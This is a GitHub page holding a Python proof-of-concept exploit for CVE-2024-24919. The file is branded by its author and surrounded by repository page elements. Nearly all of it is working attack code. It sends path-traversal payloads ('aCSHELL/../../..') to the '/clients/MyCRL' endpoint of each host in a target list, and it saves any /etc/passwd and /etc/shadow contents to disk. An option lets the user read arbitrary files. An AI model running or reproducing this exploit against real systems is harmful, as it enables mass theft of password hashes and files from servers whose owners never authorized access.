-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2024-24919.py
127 lines (110 loc) · 6.13 KB
/
CVE-2024-24919.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style
import random
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)
# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
vuln = ['root:', 'nobody:']
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ ____ _ _ ___ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \| || | / _ \/ |/ _ \
| | \ \ / /| _| __) | | | |__) | || |_ _____ __) | || || (_) | | (_) |
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____/ __/|__ _\__, | |\__, |
\____| \_/ |_____| |_____|\___/_____| |_| |_____| |_| /_/|_| /_/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
print(banner())
def make_request(url, payload=None, headers=None):
try:
response = requests.post(url, data=payload, headers=headers, verify=False)
if response.ok:
for word in vuln:
if word in response.text:
print(f"[+] {url} is vulnerable")
if payload:
if "etc/shadow" in payload:
print("╔══════════════════════════════════════════════════════╗")
print("║ /etc/shadow found: ║")
print("╚══════════════════════════════════════════════════════╝")
with open("shadow", "w") as file:
file.write(response.text)
elif "etc/passwd" in payload:
print("╔══════════════════════════════════════════════════════╗")
print("║ /etc/passwd found: ║")
print("╚══════════════════════════════════════════════════════╝")
with open("passwd", "w") as file:
file.write(response.text)
print("╔══════════════════════════════════════════════════════╗")
print(f" {response.text} ")
print("╚══════════════════════════════════════════════════════╝")
print("If you found this useful, consider buying me a coffee:")
print("https://www.buymeacoffee.com/VeryLazyTech")
print("@VeryLazyTech")
return
print(f"[-] {url} is not vulnerable")
else:
print(f"[-] {url} responded with status code: {response.status_code}")
except requests.RequestException as e:
print(f"Error making request to {url}: {e}")
def main():
payload = "aCSHELL/../../../../../../../etc/passwd"
payload2 = "aCSHELL/../../../../../../../etc/shadow"
parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - VeryLazyTech")
parser.add_argument("-l", metavar='filename', type=str, help="File containing list of HTTP/HTTPS targets")
parser.add_argument("-f", metavar='file', type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
args = parser.parse_args()
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"Dnt": "1",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
payload_base = "aCSHELL/../../../../../../../{}"
if args.f:
payload = payload_base.format(args.f)
if args.l:
try:
with open(args.l, 'r') as file:
urls = file.readlines()
for url in urls:
url = url.strip()
if url.startswith('http://') or url.startswith('https://'):
make_request(url + '/clients/MyCRL', payload=payload, headers=headers)
make_request(url + '/clients/MyCRL', payload=payload2, headers=headers)
else:
print(f"Skipping invalid URL: {url}")
except FileNotFoundError:
print(f"Error: File '{args.l}' not found.")
else:
print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
if __name__ == "__main__":
main()